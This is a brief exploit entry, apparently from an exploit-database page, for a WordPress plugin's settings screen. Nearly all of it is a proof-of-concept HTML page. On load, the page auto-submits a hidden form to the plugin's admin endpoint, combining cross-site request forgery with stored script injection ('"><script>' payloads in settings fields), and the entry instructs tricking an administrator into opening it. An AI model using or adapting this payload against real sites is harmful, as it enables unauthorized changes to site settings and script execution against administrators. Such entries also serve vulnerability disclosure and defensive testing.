Share
## https://sploitus.com/exploit?id=WPEX-ID:1D7D0372-BBC5-40B2-A668-253C819415C4
Make an admin open an HTML document containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=settings_pocket_poster" method="post">
<input type="hidden" name="wpstacker_pocket_consumer_key" value='"><script>alert(888)</script>' />
<input type="hidden" name="wpstacker_edit" value='"><script>alert(2)</script>' />
<input type="submit" value="Submit" />
</form>
</body>
```